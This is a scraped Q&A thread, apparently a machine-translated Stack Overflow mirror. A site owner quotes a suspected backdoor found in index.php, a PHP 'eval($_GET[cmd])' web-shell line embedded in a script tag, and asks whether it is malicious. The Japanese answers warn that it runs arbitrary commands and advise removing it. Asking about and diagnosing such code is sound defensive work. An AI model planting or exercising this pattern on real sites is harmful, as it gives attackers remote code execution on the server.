-1

I found in my site index.php this code

<script type="text/javascript">
  new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
  new.track("new.dev","_url",location.href);
</script>

Is that code are malicious? From web i tryed to put something like index.php?cmd=ls and nothing was appear. Maybe it needed to be on page? I trying to understand what previous admin do on site.

4

2 に答える 2

4

そのコードには終わりのないリスクがあります。eval()はphpコマンドを実行し、ターミナルコマンドを実行できます。あなたが衛生状態なしで入力を受け入れると、誰かが気が狂ってそこに深刻な害を及ぼす可能性があります。私はそれをすぐに削除し、より良い方法を見つけます。

それを書いた頭の男もボンク。

于 2012-11-16T14:09:05.780 に答える
0

cmd1) =>を引用します$_GET['cmd']

2)サーバー上でphpコードを実行することは間違いなくすべてのユーザーに許可されています。それでも、getリクエストはデフォルトで8kbに制限されています(制限は変更される可能性があります)

あなたがしていることは非常に危険です。あなたが何を達成したいのかわかりませんが、私を信頼して別の方法を見つけてください。

于 2012-11-16T14:09:41.470 に答える